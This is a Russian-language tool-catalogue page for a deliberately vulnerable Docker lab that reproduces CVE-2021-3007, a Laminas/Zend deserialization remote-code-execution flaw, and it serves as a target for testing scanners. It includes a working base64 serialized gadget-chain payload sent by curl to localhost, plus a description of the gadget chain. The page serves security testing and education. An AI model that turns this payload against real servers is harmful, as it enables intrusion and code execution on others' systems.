Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2021-3007-vulnerable — CVE-2021-3007 Vulnerable Test Environment - Laminas/Zend Framework Deserialization RCE | Kitploit
Инструменты/GitHubGitHub/kre80r/cve-2021-3007-vulnerable
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubkre80r/cve-2021-3007-vulnerable

cve-2021-3007-vulnerable

CVE-2021-3007 Vulnerable Test Environment - Laminas/Zend Framework Deserialization RCE

Репозиторий
8 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Тестовая среда для уязвимости CVE-2021-3007

Docker CVE CVSS

Преднамеренно уязвимая тестовая среда для проверки обнаружения CVE-2021-3007 в сканерах безопасности.

Обзор уязвимости

АтрибутЗначение
CVE IDCVE-2021-3007
СерьёзностьКритическая (CVSS 9.8)
ТипНебезопасная десериализация → Удалённое выполнение кода (RCE)
ЗатрагиваетLaminas HTTP < 2.14.2, Zend Framework 3.0.0
CWECWE-502 (Десериализация недоверенных данных)

Быстрый старт

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2021-3007-vulnerable
cd CVE-2021-3007-vulnerable

# Start vulnerable environment
docker-compose up -d

# Verify it's running
curl http://localhost:8080

# Test with nuclei (optional)
nuclei -t CVE-2021-3007.yaml -u http://localhost:8080

# Cleanup
docker-compose down

Однострочная команда

root@kitploit:~
docker-compose up -d && sleep 3 && curl -s http://localhost:8080 | head -1

Ручное тестирование эксплуатации

root@kitploit:~
# Send serialized payload triggering RCE
curl -X POST http://localhost:8080/ \
  -d "data=TzoyODoiTGFtaW5hc1xIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086Mjg6IkxhbWluYXNcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMzoiTGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQ0OiIATGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoyMToiTGFtaW5hc1xDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjE3OiJmaWxlX2dldF9jb250ZW50cyI7fX19czoxMzoiACoAYXR0cmlidXRlcyI7YToxOntzOjIyOiJlY2hvIG51Y2xlaUNWRTIwMjEzMDA3IjtpOjE7fX19"

# Ожидается: ответ содержит "nucleiCVE20213007", подтверждающий RCE

Технические детали

Цепочка гаджетов

root@kitploit:~
Laminas\Http\Response\Stream::__destruct()
  └─► Laminas\View\Helper\Gravatar::__toString()
        └─► Laminas\View\Renderer\PhpRenderer::plugin()
              └─► Laminas\Config\Config::get()
                    └─► system() / file_get_contents()

Уязвимые компоненты

ПакетВерсияНазначение
laminas/laminas-http2.14.1Уязвимый HTTP-компонент
laminas/laminas-view2.12.0Компонент цепочки гаджетов
laminas/laminas-config3.7.0Компонент цепочки гаджетов

Уязвимые конечные точки

Приложение принимает сериализованные данные через POST:

  • Путь: / или /index.php
  • Параметры: data, payload, serialized
  • Кодировка: Base64

Детали окружения

КомпонентЗначение
Базовый образphp:8.1-apache
Порт8080
Контейнерcve-2021-3007-vulnerable

Файлы

root@kitploit:~
.
├── Dockerfile          # Конфигурация сборки контейнера
├── docker-compose.yml  # Оркестрация (одноразовая настройка)
├── index.php           # Уязвимое PHP-приложение
├── LICENSE             # Лицензия MIT
└── README.md           # Этот файл

Уведомление о безопасности

ПРЕДУПРЕЖДЕНИЕ: Эта среда является преднамеренно уязвимой и предназначена только для целей тестирования безопасности.

НЕ ДЕЛАЙТЕ:

  • Не выставляйте в публичные сети
  • Не разворачивайте в производственных средах
  • Не оставляйте работающей без присмотра
  • Не используйте в вредоносных целях

ДЕЛАЙТЕ:

  • Используйте в изолированных тестовых средах
  • Останавливайте контейнеры, когда не используете
  • Используйте только для законных исследований безопасности

Ссылки

  • NVD - CVE-2021-3007
  • GitHub Advisory - GHSA-xx8f-qf9f-5fgw
  • Laminas Security Release
  • CheckPoint Research - FreakOut
  • Ambionics Research

Лицензия

Лицензия MIT — только для исследовательских и образовательных целей.


Создано для проверки шаблонов nuclei | projectdiscovery/nuclei-templates

Скачать инструмент